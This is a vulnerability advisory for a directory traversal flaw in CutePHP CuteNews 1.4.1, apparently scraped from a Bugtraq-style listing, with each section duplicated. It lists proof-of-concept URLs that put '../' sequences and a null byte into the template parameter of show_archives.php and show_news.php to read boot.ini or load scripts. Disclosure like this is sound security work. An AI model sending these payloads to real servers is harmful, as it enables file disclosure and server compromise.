CutePHP CuteNews Directory Traversal Vulnerability
BID:15295
Info
CutePHP CuteNews Directory Traversal Vulnerability
| Bugtraq ID: | 15295 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Nov 03 2005 12:00AM |
| Updated: | Nov 03 2005 12:00AM |
| Credit: | Discovery is credited to <[email protected]>. |
| Vulnerable: |
CutePHP CuteNews 1.4.1 |
| Not Vulnerable: | |
Discussion
CutePHP CuteNews Directory Traversal Vulnerability
CuteNews is affected by a directory traversal vulnerability.
An unauthorized attacker can retrieve or upload arbitrary files by supplying directory traversal strings '../' through an affected URI parameter.
Exploitation of this vulnerability could lead to a loss of confidentiality as arbitrary files are disclosed to an attacker. Information obtained through this attack may aid in further attacks against the underlying system.
An attacker may also upload arbitrary scripts, which may be subsequently executed leading to a remote compromise in the context of the server.
CuteNews 1.4.1 is reported to be vulnerable to this issue. Other versions may be affected as well.
CuteNews is affected by a directory traversal vulnerability.
An unauthorized attacker can retrieve or upload arbitrary files by supplying directory traversal strings '../' through an affected URI parameter.
Exploitation of this vulnerability could lead to a loss of confidentiality as arbitrary files are disclosed to an attacker. Information obtained through this attack may aid in further attacks against the underlying system.
An attacker may also upload arbitrary scripts, which may be subsequently executed leading to a remote compromise in the context of the server.
CuteNews 1.4.1 is reported to be vulnerable to this issue. Other versions may be affected as well.
Exploit / POC
CutePHP CuteNews Directory Traversal Vulnerability
An exploit is not required.
The following proof of concept examples are available:
http://www.example.com/cute141/show_archives.php?template=../../../../../../../../boot.ini%00
http://www.example.com/cute141/show_archives.php?template=../../../../../../../../[script]
http://www.example.com/cute141/show_news.php?template=../../../../../../../../boot.ini%00
http://www.example.com/cute141/show_news.php?template=../../../../../../../../[script]
An exploit is not required.
The following proof of concept examples are available:
http://www.example.com/cute141/show_archives.php?template=../../../../../../../../boot.ini%00
http://www.example.com/cute141/show_archives.php?template=../../../../../../../../[script]
http://www.example.com/cute141/show_news.php?template=../../../../../../../../boot.ini%00
http://www.example.com/cute141/show_news.php?template=../../../../../../../../[script]
Solution / Fix
CutePHP CuteNews Directory Traversal Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
CutePHP CuteNews Directory Traversal Vulnerability
References:
References: